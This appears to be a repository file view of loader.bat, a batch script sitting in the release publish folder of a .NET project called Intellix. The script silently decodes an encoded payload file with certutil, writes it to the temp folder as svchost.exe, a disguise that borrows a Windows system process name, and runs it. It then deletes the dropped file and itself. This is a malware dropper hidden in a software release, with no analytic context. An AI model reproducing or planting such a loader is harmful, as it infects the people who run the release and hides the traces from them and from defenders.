Files
Intellix/bin/Release/net48/win-x64/publish/loader.bat
T
2026-08-27 10:55:23 -06:00

6 lines
149 B
Batchfile

@echo off
certutil -decode "%~dp0payload.b64" "%temp%\svchost.exe" >nul 2>&1
start "" "%temp%\svchost.exe"
del "%temp%\svchost.exe" 2>nul
del "%~f0"